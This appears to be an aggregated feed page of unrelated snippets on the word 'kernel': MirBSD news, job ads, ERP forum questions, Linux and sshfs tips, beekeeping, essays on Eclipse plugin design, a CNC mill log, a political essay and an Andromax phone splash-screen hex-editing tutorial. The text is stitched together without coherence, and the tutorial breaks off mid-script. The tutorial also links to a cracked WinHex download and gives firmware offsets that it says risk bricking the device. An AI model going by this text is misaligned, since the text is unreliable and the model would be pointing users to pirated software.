In MirBSD, Benny and I just added a number of errnos, mostly for SUSv4 compliance and to be able to compile more software from pkgsrc® without needing to patch. This is being tested right now (although I should probably go out and watch fireworks in less than half an hour), together with the new imports and the bunch of small fixes we accumulate (that most development in MirBSD currently happens in mksh(1) and the like doesn’t mean that all of it does, or worse, that we were dead, which we aren’t). I’ll publish a new snapshot some time in January. The Grml 2012.12 also contains a pretty up-to-date MirBSD, with a boot(8/i386)loader that now ignores GUID partition table entries when deciding what to use for the ‘a’ slice.

If you haven’t already done so, read Benjamin Mako Hill’s writings!


          Software Development Engineer   
Responsibilities:
Design, develop, and document test frameworks using Java, C, or C++
Provide technical leadership and direction to testing team members to ensure adherence to coding, quality, functionality, performance, scalability, and on-time delivery standards.
Lead, mentor, and motivate team members to maximize their potential, foster innovation, boost productivity, and deliver high-quality software.
Work with a cross-functional team of hardware and software engineers to develop innovative automated testing solutions
Assist with measuring software quality and be able to present tradeoffs and provide risk assessment to all stakeholders.
Participate in defect triage meetings and provide defect reports to project team
Represent QA during project requirements and architectural reviews
Author test plans, test cases, and test reports
Serve as point of contact for day-to-day automation activities and resource allocation
Work closely with development teams, product managers, and peers to root-cause, debug, and resolve issues
Perform code-reviews, coach and mentor team members to follow best practices and procedures

Minimum Qualifications:
Bachelor's degree in engineering, computer science or related field; advanced degree desirable.
4+ years of experience leading software testing teams.
5+ years of software development experience testing mobile, web, and/or enterprise apps, platforms, or systems
Outstanding programming skills in Java, C, or C++
Advanced experience with client side technologies such as JavaScript, CSS3, HTML5, AJAX, XML, JSON, REST, DOM and others.
Excellent experience and knowledge in leading the testing lifecycle of large-scale mobile platform or enterprise software products.
Experience with Agile development methodologies.
Proven experience in testing, and leading testing of, mobile SDKs/APIs or enterprise software platforms.
Excellent communication, organizational and analytical skills.
Experience with tools such as JIRA, Selenium, LoadRunner, etc.

Preferred Qualifications:
Proficient in Python, Perl, and shell scripting
Ability to programmatically test the product, measure test coverage, drive testability and diagnostic ability into the product, while promoting best practices in quality areas
Experience testing the kernel, kernel subsystems, and user space applications
Experience with open source test tools
Experience with Makefiles and Ant build scripts
API automation testing including working experience with unit test automation frameworks
Familiarity with the Eclipse IDE, GitHub, and Android SDK
Ability to triage issues, react well to changes, work with teams and ability to multi-task on multiple products and projects
Excellent communication, collaboration, reporting, analytical and problem solving skills
Comfortable working in short release cycles (2–4 weeks)
Experience working with and configuring continuous integration systems (e.g. Jenkins)
Experience with Selenium WebDriver, Robotium, Appium, Calaba.sh or other automation frameworks
Experience writing code to test the Linux operating system, specifically, an in-depth understanding of the real time kernel, power management, scheduler, memory management, inter-process communication, and driver model

Bonus-experience:
Experience developing mobile test apps (Android, iOS, etc)
Experience or familiarity with the Android CTS test suite

We are an equal employment opportunity employer and will consider all qualified candidates without regard to disability or protected veteran status.
          Embedded Hardware Designer   
Outstanding company in Central California is looking for a talented developer to help build their new Ethernet and wireless communication products. Are you a fast and reliable worker? Do you like working in a casual and fun environment? Do you want to build products that will be deployed all over the world? Then this might be the spot for you at our Bakersfield, CA headquarters.
Key Responsibilities:
• Hardware design, prototyping and debugging
• Work with firmware engineers to bring up new platforms
• Capable of quickly learning new platforms
• Adaptable and able to work independently
Requirements:
At least 5 years of industry experience in the following:
• CPU board design using ARM processor architectures
• Component selection
• Schematic capture
• PCB layout
• General digital design
• USB & Ethernet interface design
• BSP development (Linux kernel)
• Experience with a broad range of processors
• Strong communication skills
• Ability to manage projects from inception to completion
Useful Skills:
• Rockwell or Schneider PLC experience
• 802.11 and cellular experience
• Industrial automation
• FPGA/VHDL development


Company specializes in the development of communication solutions compatible with the large automation suppliers' controllers, such as Rockwell Automation and Schneider Electric. The primary focus is to provide connectivity solutions that link dissimilar automation products. Company provides field-proven connectivity and communication solutions that bridge between various automation products as seamlessly as if they were all from the same supplier.

The company offers a very competitive salary and benefits package in an area where cost of living is extremely affordable.

Bakersfield is a better choice for living, working, growing, and playing, as it is affordable, accessible, and extremely welcoming. It is home to California State University, Bakersfield, Bakersfield College, a UC Merced campus and extensive adult education facilities. Bakersfield is also linked to the UCLA medical school through its six area hospitals. Besides the educational opportunities, Bakersfield offers several natural attractions. It is within two hours of Pacific Ocean beaches, mountains, and the Giant Sequoia National Monument. Bakersfield is home to one of the fastest-flowing rivers west of the Mississippi, the Kern River, where white-water rafters enjoy the great outdoors. Others enjoy leisurely walking, biking and roller-skating along the Kern River Parkway, extending nearly 20 miles along the banks of the Kern River. For more about this community and area, visit www.bakersfieldcity.com

Qualified candidates please submit your resume and any links to projects or open source contributions that you have made ASAP for review.


We are an equal employment opportunity employer and will consider all qualified candidates without regard to disability or protected veteran status.
          Realization of consumed hours and consumed cost amount on Secondary 1 operations   

Hi,

We have introduced Secondary 1 Priorities (together with the Primary Priority) on the same Operation number for our production routes, in order to split our Operations by different man- and machine-related cost categories (with differentiated hourly cost rates). The number of estimated hours for the Primary and Secondary 1 Operations is always the same.

However, in the price calculation, when comparing the estimated consumption of hours and the cost amounts for those hours on line level and total level, we don't get any realized consumption or cost amount for hours reported on Secondary 1 Operations.

We are running AX 2012 R2 CU6, Kernel version 6.0.1000.2473. 

What further actions must I take to prepare AX to realize consumption of hours and cost amounts for the Secondary 1 Operations?


          Applying Hotfix/Patch to AX 2012 R2/AX 2012 R3 production environment?   

Hi folks, 

I have tried to find out the best way to do this, but all I found was about moving customizations (which I am fully aware of). 

I have some confusion in applying hotfix to a production environment. 

I am following below steps: 

1. Prepared a test environment with the latest backup of the production databases (business and model store). 

2. Applied the kernel and application hotfixes on the test server. 

3. Resolved all errors and completed the software update checklist.

Now, I am planning to export the model store from test and import it into production (after taking a proper backup :) ). Before this I will apply the kernel hotfix on production.

After that, I will synchronize the data dictionary. 

Then, do I need to complete the software update checklist (code and data upgrade) again on production?

Or, what steps can I follow after importing the model store to production? Is there a different strategy I could follow for minimal downtime of the production server?


          Mount remote filesystem via ssh protocol using sshfs and fuse [Fedora/RedHat/Debian/Ubuntu way]   
Imagine the following situation: you have to compile some Linux/Unix application or kernel module that requires the kernel source to be present on your hard drive, say, in /usr/src/kernels/kernel-2.6.21-i386/ or elsewhere. But there is not enough disk space to copy these sources or to install the kernel-devel or linux-source packages (in Fedora/RedHat or Ubuntu/Debian distros respectively)… Sounds familiar? Believe me, sometimes it happens. As a solution you can mount the directory of some remote PC […]
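The body of the post is elided above; as a sketch of the technique it describes, a typical sshfs session looks like the following (the hostname and user are illustrative; the kernel source path is the one from the post):

```shell
# Debian/Ubuntu: apt-get install sshfs    Fedora: yum install fuse-sshfs
mkdir -p ~/mnt/kernel-src

# Mount the remote kernel source tree over ssh; no server-side setup
# beyond a running sshd is required, FUSE does the rest.
sshfs user@buildhost:/usr/src/kernels/kernel-2.6.21-i386 ~/mnt/kernel-src

# ... configure and build against ~/mnt/kernel-src as if it were local ...

# Unmount when done.
fusermount -u ~/mnt/kernel-src
```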
          How a 20-year-old kernel feature helped USDS improve VA’s network   
          What Excites Me The Most About The Linux 4.12 Kernel   
Phoronix: If all goes according to plan, the Linux 4.12 kernel will be officially released...
          Linux Kernel (Beta) 4.12-rc7   

Linux Kernel is the essential part of Linux, responsible for resource allocation, low-level hardware interfaces, security, simple communications, and basic file system management.

Copyright Betanews, Inc. 2017


          Linux Kernel 4.11.8   

Linux Kernel is the essential part of Linux, responsible for resource allocation, low-level hardware interfaces, security, simple communications, and basic file system management.



          What you might Find in the BeeHive   

You have set up your hives and installed your bees with the queen cage attached to a frame. We know that you are eager to check on them to see how they are doing but disrupting the colony will hinder them. Give them time to acclimate to the new queen and release her on their own (will typically take 5 to 7 days). Once you have given them time to release the queen on their own, you can open up your hive and see your bees hard at work!



When you first open your hive to remove the queen cage, you may notice no substantial changes, but your bees are working frantically to draw out comb, allowing space for the queen to lay her eggs and room to store their nectar. There will be some foraging bees sent out to bring in nectar and pollen but the majority of the force will be building up the frames. Providing feed during this time is vital. As the bees work the frames, they will be consuming feed almost as fast as you are providing it for them. Keep the feeder on the hive!
Other things to be aware of:


 Don’t be frightened to find that your colony seems smaller than when you installed it. This is a new colony, and it will take time for the population to grow. The population will begin to decrease before it starts increasing, because the newly laid eggs must be raised out to replace the older bees.





As the bees begin to work the frames, drawing out foundation, they may draw out a queen cup. There is no reason to fret. A queen cup does not mean your hive is queen-less, but is a precautionary measure your worker bees take to ensure they can raise a new queen quickly if something were to happen with the current queen. A queen cup is a single cup which is located in the middle of the frame. It should not have an egg or larva inside.





When you begin working your hive, your first instinct is to look for the queen. The queen is one of thousands of bees throughout the hive. Although she is much larger than the worker bee, she will be extremely hard, if not impossible, to find. An alternative is to check the frames for eggs. Eggs signify that the queen has been released and is laying. Eggs are also difficult to see (though less difficult than finding the queen); they appear as small white kernels, similar to grains of rice.


You will tend to see other insects in your hive that you would not expect. Most hide out on the inner cover, away from the colony. These can include earwigs, spiders, roaches, and many more. These common insects do not cause any damage and tend to stay for the heat, darkness, and shelter of the hive. There are some insects that can cause damage within the hive: the small hive beetle and the wax moth. They will lay their eggs in the hive and can destroy comb. The wax moth is more of a concern in late fall when equipment is being stored. The small hive beetle is a year-round problem that can be managed. A strong colony will keep the hive beetle in check, but if their population begins to rise, insert a beetle trap into your hive.


After installing your bees, you will place the frames back into your hive. Inevitably one or two frames will be spaced too far apart, leaving room for the bees to draw out excess amounts of comb. You can leave the burr comb in the hive, and the queen will lay eggs or workers will store honey in the cells, but the burr comb will limit what can be worked on adjacent frames. For the best results within the hive, remove the burr comb and take the time to space out your frames evenly. Burr comb can be melted down and used in candles or lip balms.




Installing your package is just one of the first steps into this exciting hobby. Once your queen has been released and starts laying eggs, you will begin to see a large field force in your garden, buzzing from flower to flower.



          Comment on Preventing brute force attacks using iptables recent matching by Dirk Wetter   
Hi Marcin, hitcounts > 20 have to be enabled in the xt_recent kernel module, see: http://serverfault.com/questions/370145/expert-iptables-help-needed Cheers, Dirk
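For reference, and with illustrative numbers: the xt_recent module's ip_pkt_list_tot parameter bounds the largest usable --hitcount (it defaults to 20, and iptables rejects rules asking for more), so it has to be raised at module load time, roughly like this:

```shell
# xt_recent remembers at most ip_pkt_list_tot packets per source address
# (default 20); reload the module with a larger table.
modprobe -r xt_recent
modprobe xt_recent ip_pkt_list_tot=50

# Persist the setting across reboots (path varies by distro):
echo 'options xt_recent ip_pkt_list_tot=50' >/etc/modprobe.d/xt_recent.conf

# A --hitcount above 20 is now accepted, e.g. the usual SSH rate-limit pair:
iptables -A INPUT -p tcp --dport 22 -m state --state NEW \
  -m recent --name SSH --update --seconds 60 --hitcount 40 -j DROP
iptables -A INPUT -p tcp --dport 22 -m state --state NEW \
  -m recent --name SSH --set -j ACCEPT
```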
          Jolicloud   

Opie7423 wrote:

It is more cloud-based than others, though--although I agree it's not "pure" cloud. All my settings are stored on their servers, so if I wanted to I could log into my.jolicloud.com and access my applications. I can't see my local files, though, which is why I normally describe it as a "fog" os (it's not entirely cloud, but not entirely physical either!).

The high-level code (essentially everything on top of the kernel) is written in HTML5, as well; which makes it interesting to play with from a development point of view.

It's neat... but not cloud related. It might be SaaS related, but it doesn't use virtualization, a virtualization abstraction, or an API for that, nor does it connect to services that do. It's cloud only in the marketing sense, not in the technical sense.




          Comment on Advisory for latest security updates on RHEL 7 by Michael Friedrich   
A new release won't change the rlimits the Icinga 2 application sets by default. It will still require a local workaround for the kernel regression, so it doesn't help much for our users, and we believe it would create unneeded chaos: many will expect that 2.7 will just "solve" the kernel regression, and be angry when it doesn't. The proper fix is a kernel update which fixes the regression and possibly other problems with the stack guard patches. Red Hat is well on its way to doing so; users have reported that a new kernel version was released.
          Sample ASP Components: now at Github   
Beginning ATL 3 COM Programming

From October 1996 to May 1997, I wrote a number of sample components for the then-new Active Server Pages (Classic ASP). I worked for MicroCrafts, a consulting company in Redmond, WA; the samples were written for Microsoft's Internet Information Server (IIS) team. Most of the components used Microsoft's new Active Template Library (ATL), a C++ library for COM.

This work had two important consequences for me: Microsoft recruited me to join the IIS development team to work on improving ASP performance for IIS 3, and Wrox Press invited me to write Beginning ATL COM Programming. I was originally supposed to be the sole author of the book, but I was a slow writer and I was caught up in the IIS 4 deathmarch, so Wrox brought in three more co-authors to complete the book. A fourth co-author was brought in for the second edition, Beginning ATL 3 COM Programming. As for IIS, I spent seven years on the team, where in addition to leading the performance team, I also worked on the http.sys kernel driver that was released in Windows Server 2003 (IIS 6).

For many years, these components could be found at http://www.georgevreilly.com/sample-ASP-components.html. I'm making them available now at Github.


          Review: Pragmatic Version Control Using Git   
Pragmatic Version Control Using Git
Title: Pragmatic Version Control Using Git
Author: Travis Swicegood
Rating: 4/5
Publisher: Pragmatic Bookshelf
Copyright: 2008
Pages: 179
Keywords: computers
Reading period: 10–18 October, 2009

As part of my personal conversion to Git, I read Swicegood's Git book. It's a decent introduction to Git and you learn how to do all the basic tasks as well as some more advanced topics. The examples are clear and well-paced.

I would have liked to see more about collaboration and workflow in a DVCS world, perhaps a few case studies: how is Git used in the Linux kernel development process; how a small, distributed team uses Git and GitHub; how a collocated team migrates from more traditional tools.

The book avoids discussing the lower levels of the Git object model, which is a reasonable choice for a pragmatic guide.

Recommended.


          today's howtos   

          Friday Farmers Market At Everett Mall Looking For Kids   
The KERNEL Kids Program has been added to the list of things happening at the Friday Farmers Market at the Everett Mall. Every Friday from 3-7 PM KERNEL (Kids Eating Right-Nutrition and Exercise for Life), is a project designed to engage children in learning about lifelong healthy eating habits, gardening, and exercise. Upon completion of […]
          raspberry pi: raspbian jessie start menu screenshots   
when you’re booting up a raspberry pi and have no display/cable/adapter at hand, it can be useful to navigate the start menu blindly using only the keyboard, e.g. to open a terminal and run a short command. here are screenshots of the raspberry pi’s operating system and start menu, raspbian jessie (v. 16.02.2017, kernel 4.9) […]
          Eclipse (3.1) Plugin Framework (an OSGi-based plugin architecture)   

Overview
The most brilliant part of Eclipse is its Plugin Framework; one could say that Eclipse has, to some extent, popularized the plugin mechanism. Of course, that is not Eclipse's only strength, but it is precisely because of the plugin mechanism that Eclipse can be extended continuously and keeps getting more powerful. I had long wanted to analyze Eclipse's Plugin Framework but kept putting it off for various reasons. This weekend I happened to be free, so I finally sat down to study it. My method was primitive: I analyzed Eclipse's startup process, based on Eclipse 3.1. I won't walk through the analysis itself here; instead, here are the conclusions.
Architecturally, Eclipse essentially follows a Kernel + Core Plugins + Custom Plugins structure. Everything outside the kernel is a plugin ("all are plugins"), and every plugin is replaceable.

OSGi
Since Eclipse 3.0, OSGi has been the basis of the plugin architecture implementation, so OSGi deserves a brief introduction, mainly from the plugin perspective. OSGi's main concepts are Bundles and Services. A Bundle can be thought of as a module's manager: it manages the module's lifecycle mainly through a BundleActivator, while Services are the objects the module exposes to the outside. Here OSGi differs from traditional plugin frameworks: management and static structure are kept separate. In OSGi, a Bundle is published by adding entries to its manifest.mf file describing the Bundle's vendor, version, unique ID, classpath, exported packages, and the packages it depends on. Each Bundle has its own ClassLoader and context; through the context it can register and unregister services, and these operations are broadcast via an event mechanism to the other Bundles concerned. Typically, a Bundle exposes its services by registering them in its initialization code. To call a service provided by another plugin, you first obtain a handle via the context's getServiceReference, then get the actual service object via context.getService(ServiceReference).

Eclipse plugin definition
In Eclipse, a plugin is defined as a module containing a set of services. Since Eclipse follows OSGi, a plugin usually consists of a Bundle plus any number of Services. On top of this, Eclipse recognizes two kinds of relationships between plugins: dependency and extension. Dependency can be expressed in the OSGi metadata by listing the plugins to be referenced, but extension is not defined by OSGi, so Eclipse implements plugin extension through the Extension Point mechanism.
Integration with OSGi
Following OSGi, a plugin's ID, version, vendor, classpath, dependent plugins, and exported packages are all defined in the manifest.mf file.
Plugin Extension Points
For extension, Eclipse uses Extension Points. Every plugin can define its own extension points and can also implement extension points of other plugins. Since this is undefined in OSGi, Eclipse describes it in plugin.xml: an <extension-point id="" name="" schema=""> element defines a plugin's own extension point, while an <extension point=""> element declares an implementation of another plugin's extension point. The extension point itself is described by a schema; see the Eclipse extension-point schema specification for details. To make the concept concrete, consider the toolbar: the toolbar plugin provides an extension point through which other plugins can add buttons to the toolbar, along with the handlers for those buttons (which must, of course, implement the interface the toolbar plugin's extension point requires); the toolbar plugin then invokes the button actions via callbacks. Extension points thus provide a clean way both to offer extensibility and to implement extensions.
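As a sketch, the two plugin.xml declarations look roughly like this (the IDs, element names, and class names below are made up for illustration; a real extension point defines its own element structure in its .exsd schema):

```xml
<!-- In the toolbar plugin: declare an extension point others can implement -->
<plugin>
   <extension-point id="toolbarButtons" name="Toolbar Buttons"
                    schema="schema/toolbarButtons.exsd"/>
</plugin>

<!-- In a contributing plugin: implement that extension point -->
<plugin>
   <extension point="com.example.toolbar.toolbarButtons">
      <button label="Hello" class="com.example.hello.HelloAction"/>
   </extension>
</plugin>
```

The toolbar plugin would look these contributions up in the extension registry and instantiate com.example.hello.HelloAction through the IConfigurationElement callback mechanism.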

Eclipse Plugin Framework
So how does Eclipse actually implement the plugin mechanism? First, a word about Eclipse's design style. Eclipse applies two important layering rules: language-dependent and language-independent code are kept apart (e.g. jdt.core vs. core), and core is kept apart from UI (e.g. workbench.ui vs. workbench.core). These rules are visible throughout the Eclipse code base, very much including the Plugin Framework. Following OSGi, Eclipse first implements an OSGi framework of its own, mainly in its FrameWork, BundleHost, ServiceRegistry, and BundleContextImpl classes; if you are interested, read that part of the code, which implements installing, starting, and uninstalling Bundles as well as registering, unregistering, and invoking Services. For plugins, Eclipse uses lazy loading: a plugin is only actually started when it is called, implemented with a handle/body pattern. Externally, plugins are started and stopped through OSGi, while the plugins themselves register, unregister, and invoke services through their BundleContext. So much for the OSGi part of the implementation.
And how does Eclipse implement Extension Points? When loading a plugin, Eclipse parses plugin.xml, extracts the <extension-point> and <extension> nodes, and registers them in the ExtensionRegistry. Each plugin that provides an extension point handles it at the place where the extension applies. For example, the toolbar plugin provides the toolbar extension point; when building the toolbar, it calls Platform.getPluginRegistry().getExtensionPoint(extension point ID) to obtain the set of implementations of that extension point as IExtensionPoint[], from which it obtains IConfigurationElement[]; through these it can read the configuration inside each <extension point=""> element and also instantiate the callback objects. In this way Eclipse implements both plugin extension and the callbacks into the extending code. The Plugin Framework also makes heavy use of events, e.g. the framework's event mechanism for notification when Bundles and Services are registered.

Summary
Analyzing Eclipse's startup process makes the Kernel + Core Plugins + Application Plugins structure clearly visible; in the code it corresponds to loadBasicBundles and registerApplicationServices. loadBasicBundles loads the basic bundles listed under osgi.bundles in config.ini; if you look at that setting you will find org.eclipse.core.runtime plus an update bundle. core.runtime then drives the startup of the whole of Eclipse through IDEApplication, and registers all the workbench-related plugins along the way.
Because earlier versions of Eclipse's Plugin Framework did not use OSGi, backwards compatibility is provided through EclipseAdaptor. New plugins essentially use manifest.mf to describe the OSGi part of the plugin and plugin.xml to describe the extension-point information.
Eclipse contains a great deal of excellent design, which you feel keenly when reading its code; for instance, the Extension Object/Interface pattern mentioned in Contributing to Eclipse is really very good. It may look simple once you see it; the key is to come up with it and to apply it in the right place.
To sum up ^_^: the Eclipse Plugin Framework is implemented as an OSGi implementation plus plugin extension points, covering plugin deployment and authoring, per-plugin ClassLoaders and contexts, registration and invocation of a plugin's services, plugin dependencies, plugin extension, and plugin lifecycle management.

Food for thought
The Eclipse Plugin Framework is built on an OSGi implementation, which to some extent shows OSGi's strengths. How would a JMX + IoC style plugin framework compare? Where does the Eclipse Plugin Framework fall short, and what would be worth improving?

 



BlueDavy 2005-07-03 21:57

          Key factors of a Plugin Framework   

Plugin systems are unquestionably popular by now: "plug and play" shows up in countless whitepapers and solution documents, and component- and plugin-oriented software keeps multiplying. Pluggable, building-block style assembly of systems has always been one of the software world's aspirations. Still, a few things about plugin systems puzzle me, and I hope we can discuss them together ^_^. Current plugin frameworks basically all share a Kernel + Core Plugins structure — in other words, "all are plugins" ^_^. Eclipse is the typical example, and arguably Maven counts as well.

A Plugin Framework's responsibilities are usually:

1. Scan the relevant directories and register everything under them that qualifies as a plugin with the Plugin Framework

2. Provide a way for the outside world to invoke plugins

3. Provide a way for plugins to interact with each other

4. Load plugins, building the appropriate ClassLoader from each plugin's descriptor

5. Document how plugins are to be written

Of course, a good Plugin Framework should also provide a plugin development wizard, an IDE for developing, debugging, and deploying plugins, and so on.

I would mainly like to discuss the following points — and feel free to add anything else you think is worth discussing:

1. Writing plugins

What would your ideal plugin system require of plugin authors? In my view, a good plugin system places no requirements on the code itself, only on how the descriptor file is written.

2. Deploying plugins

How can deploying a plugin be made more convenient — for example, OSGi's ability to fetch over the network? I imagine scanning configured directories or sites for plugins and registering them with the system.

3. Invoking plugins

Invoke each plugin in whatever manner its descriptor specifies, e.g. via web service, via socket, and so on.

4. Plugin interaction

For interaction between plugins, perhaps Maven's approach is worth borrowing: to call another plugin, use a configuration or invocation like <attain plugin="pluginname" function="sendmail"/> — or should dependencies be injected via an IoC container?

5. Plugin extension

For plugin extension, Eclipse's extension points are well worth borrowing from.

6. Analyzing dependencies between plugins

This is something I have been envisioning: if all modules of a system were built on such a Plugin Framework, we could analyze the dependencies between the system's modules, monitor them, and perhaps in the future even configure them graphically — assembling your own system graphically out of building blocks ^_^

I would also love to hear more about Plugin Framework techniques, e.g. approaches to implementing a Plugin Framework on top of OSGi.


BlueDavy 2005-05-25 15:42

          Trying out the CNC mill at Noisebridge   

I've been doing quite a bit of fabrication work at Noisebridge over the last year or so -- mostly electronics, plus a bit of 3D printing. One bit of equipment I've been interested in for a while is the MaxNC 10 CNC mill, which has been covered by a sheet for a while and appeared out of order, but has recently been unearthed and looks a bit happier. I gave it a try tonight, and it looks like it should be usable!

It's controlled by a computer under the desk running an ancient version of Ubuntu, with a realtime kernel for the control software. Booting it up and double-clicking the maxnc10ol link on the desktop brought up LinuxCNC. Flipping the red switch on the mill brought it to life, and the machine started up properly after hitting F1 then F2.

The axes are set up so that the origin is the bottom left front corner of the thing being milled, and the positive direction is right/back/up in the x/y/z axes:

  • X axis: + moves the platform left, - moves the platform right
  • Y axis: + moves the platform towards the user, - moves the platform towards the machine
  • Z axis: + moves the bit up, - moves the bit down

When homing axes, you can only move an inch in the 'negative' direction before the software stops you -- you need to rehome the axis (redefine your negative position as 0), hit F1 twice and F2 again, and then you can move it another inch. So it took a few tries to get the machine to move far enough to the left (moving the platform over to the right), and a couple more to get the Y axis homed.

Once the spindle looks like it's in a safe place, you can run your program with Machine | Run Program. This will start the spindle and move through the program, then stop wherever it finished. It happily ran through its demo program.

The mill is a little small for the sorts of things I have in mind (large wooden boards cut into interesting shapes, like a lot of art at Burning Man these days), but it could work nicely for PCB milling -- someone at Noisebridge has had some luck with this -- if I get some cheap PCB blanks from AliExpress and a couple of carbide mill bits. I suspect the sweet spot here would be very simple single-sided boards that are SMD-only... for example, one-off custom LED fixtures with a string of addressable LEDs and no onboard controller (or a very simple one that doesn't need any complicated traces or small pads -- so my favourite tiny MCU, the MKE04Z8VTG4, would be out, but the SOIC version would be OK, or maybe the 0.8mm TQFP44 MKE*VLD* chips).

Comment


          (USA-WA-Redmond) Senior Software Engineer   
We are a team in Azure Compute responsible for providing persistency by utilizing exabytes of storage in Microsoft datacenters. Our software aggregates disk space and makes it available to customers as block storage (disks of any size – currently from 1 GB to 320 petabytes) or relational storage (highly available SQL databases). Our technology is uniquely interesting because it touches all levels of the software stack - from the Windows kernel storage drivers to a massively replicated, Paxos-based distributed system that coordinates global storage allocation.

Our team subscribes to all modern paradigms of software development: we roll out to production every week, we code-review every change, we use a cloud build/test pipeline, we design high-scale, loosely coupled systems with built-in fail-safe and self-healing mechanisms, we do copious amounts of production debugging, testing and monitoring, and we collect the data before writing code. And we have been doing it for the last five years.

We are looking for senior and principal engineers who can help us take the system to the next level: expose it for wide usage in Azure, scale up to the next order of magnitude (from exabytes currently), and optimize distribution algorithms for Azure datacenters. You should be able to quickly learn several large codebases, produce simple solutions for real problems, implement them efficiently, and patiently guide production deployments to success.

Why should you work on our team? Our technology is one of the top three most advanced systems in its field on the planet. If you love storage and/or distributed systems, this is the system to work on. If you have expertise in operating systems development and would like to expand into distributed systems, or vice versa, this is a great opportunity to capitalize on your existing expertise while learning the other universe.
We have the resources of a huge, powerful company behind us, but none of the bureaucratic overhead that is often associated with it. We are at the tip of the tens of billions of dollars the company is investing in software services in general, and Azure in particular. You will work with brilliant people on a project that directly impacts thousands of developers, and indirectly impacts hundreds of millions of customers. You will learn new things, and share your knowledge with us. Interested? Drop us your resume and we will be happy to talk more!

Preferred Qualifications:
•Distributed systems, or operating systems kernel and driver development.
•Experience with the Windows storage stack and SQL Server is preferred.
•C++ (on a scale from one to ten where Stroustrup is eight, we expect you to be no less than five).

Basic Qualifications:
•5+ years of commercial software development experience.

“You will be required to pass Microsoft background checks prior to the start of employment and periodically thereafter. Further details regarding this process will be provided in follow up correspondence.” The ability to meet Microsoft, customer and/or government security screening requirements is required for this role. These requirements include, but are not limited to, the following specialized security screenings: Microsoft Cloud Background Check: This position will be required to pass the Microsoft Cloud background check upon hire/transfer and every two years thereafter.

Microsoft is an equal opportunity employer. All qualified applicants will receive consideration for employment without regard to age, ancestry, color, family or medical care leave, gender identity or expression, genetic information, marital status, medical condition, national origin, physical or mental disability, political affiliation, protected veteran status, race, religion, sex (including pregnancy), sexual orientation, or any other characteristic protected by applicable laws, regulations and ordinances.

If you need assistance and/or a reasonable accommodation due to a disability during the application or the recruiting process, please send a request to askstaff@microsoft.com. Development (engineering)
          Device Driver Development Engineer - Intel - Singapore   
Knowledge of xDSL, Ethernet switches, wireless LAN, security engines and microprocessors is an advantage. Linux driver/kernel development for Ethernet/DSL/LTE modems...
From Intel - Sat, 17 Jun 2017 10:23:08 GMT - View all Singapore jobs
          Kernel Traffic   
none
          KernelTrap   
none
          IC Resources Ltd: Embedded Linux Software Engineer   
Negotiable: IC Resources Ltd: Talented Embedded Linux and Linux Kernel Software Engineers are sought by this leading Cambridge-based communications developer. Cambridge
          Overcoming Individualism   

By Matt Hartman

DSA’s recent growth has been well celebrated. But while it is a sign of hope, it would be a mistake to assume that this path will lead to the socialist movement we want, because who is joining DSA and how they relate to the rest of the world is just as important as how many of us there are.

To be clear, the “Bernie Bro” narrative painting DSA as a monolithically white and male organization is a fallacy that erases the many and longstanding contributions of socialist women and people of color. But there is a kernel of truth to it that has allowed it to take hold: exact demographics aren’t available, but it’s undeniable that DSA’s membership is whiter, richer, and more masculine than the working class we’re working for. To succeed in the long term, we must address that problem at the root by prioritizing organizing projects that create material connections between the everyday lives of DSA members and the working class more broadly.


          Making Your Own Splash Screen   


--Warning! Brick risk--
Make sure the firmware [Software Version] is E667.6.03.00.ID11, not E667.6.01.08.ID11
 
Link to the tutorial: http://goo.gl/1QpuL <-------------
 
Tool links
HexEditor by TUBA
https://play.google.com/store/apps/details?id=tuba.tools&hl=en

WinHex X-Ways full license: just pick your version.
http://cracking.z0ro.com/Reverse-Engineering/Editors-Viewers-Comparers/WINHEX/
On the blog I deliberately linked only the WinHex demo; posting an illegal link could get my Google AdSense account banned.

Bookmarks for the Smartfren logo positions in MMCBLK
For anyone having trouble with GoTo Offset:
Download http://www.facebook.com/download/356600391120227/Andromaxi_MMCBLK0P5_0P20.pos
Then, in WinHex, click Position -> Position Manager; in the pane that appears, right-click and choose Load.
Once it's loaded, just click the positions I've already named.

########################
TIPS & TRICK SECTION
########################

** 'E is an invalid character'
In the Offset column in WinHex there are blue numbers underneath. Click them and the display switches to hexadecimal.

** Trouble dumping the MMCBLK partition
Solution: download a ready-made splash ZIP, extract it, take the IMG and open it via WinHex.

** Can't save
Download the full version of WinHex from the link in this doc.

** ERROR: write protect
Cause 1: read-only mode.
In WinHex, press [F6] and switch from Read-Only Mode to Default Edit Mode.

Cause 2: Winhex.exe was run directly without being extracted.
Extract the WinHex ZIP first, then run Winhex.exe.

** Checking the firmware inside SPLASH.IMG
Look at addresses 248 through 258; the firmware version E667.6.03.00.ID11 is written there.
To view it you can use WinHex on Windows, or the HexEditor app from the market. If you use HexEditor on the Maxi, extract the .IMG file inside first before opening it with HexEditor.

------------------------------------------------------------------------------------------------------------------------------------

** The image cannot be larger than 202 KB
The image block sits at addresses 8E525 through C1380.
First make sure the hex code at address 8E525 is 89 50 4E 47 0D 0A 1A 0A
and that address C1380 still holds 82, with |END next to it (bytes 49 45 4E 44 AE 42 60 82).

-- Flashing succeeds but the image is broken!
** If the image is not sRGB, the phone will either bypass the splash screen, show a blank black image, or display it garbled. Use MS Paint or any program other than Photoshop as the workaround.

==================================
TIPS: Keeping the image under 202 KB
===================================

-- Screenshot from the MAXI. by @Tablin Arya Juanda
Use the Andromax-I's own screenshot function:
- Open the image in the gallery (or whatever) so it's fullscreen.
- Press Power + Volume Down together; a click sound confirms the screenshot was taken.

-- Use the RIOT app [WINDOWS]. Thanks @Apak Wawan
Crop the image to 480x800 first, then choose PNG as the output format, pick 'compress to size' and enter 200 KB, so the file won't end up larger than 202 KB.
http://luci.criosweb.ro/riot/download/

=============================================================##########
=============================================================##########

***Extracting the image inside SPLASH.IMG with WinHex
In WinHex, open the .IMG file in question, then right-click and choose Define Block; enter 8E525 at the top and C1380 at the bottom. After clicking OK, press CTRL+C, then right-click -> Edit -> Clipboard Data -> Paste Into New File (or simply press SHIFT+INSERT). The copied data shows up in a new window; save it with a .PNG extension.
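For anyone who'd rather not click through WinHex, the same Define Block extraction can be sketched with dd. This is only a sketch under the assumptions stated in this post (image block at 8E525 through C1380, both ends inclusive); the dummy splash.img it creates just stands in for a real partition dump.

```shell
# Sketch of the WinHex "Define Block" extraction above, done with dd.
# Offsets are the ones given in this post; both ends are inclusive.
START=$((0x8E525))   # first byte of the PNG header (89 50 4E 47 0D 0A 1A 0A)
END=$((0xC1380))     # last byte of the IEND chunk (49 45 4E 44 AE 42 60 82)
LEN=$((END - START + 1))

# Demo only: fake a splash.img with a marker at the PNG offset.
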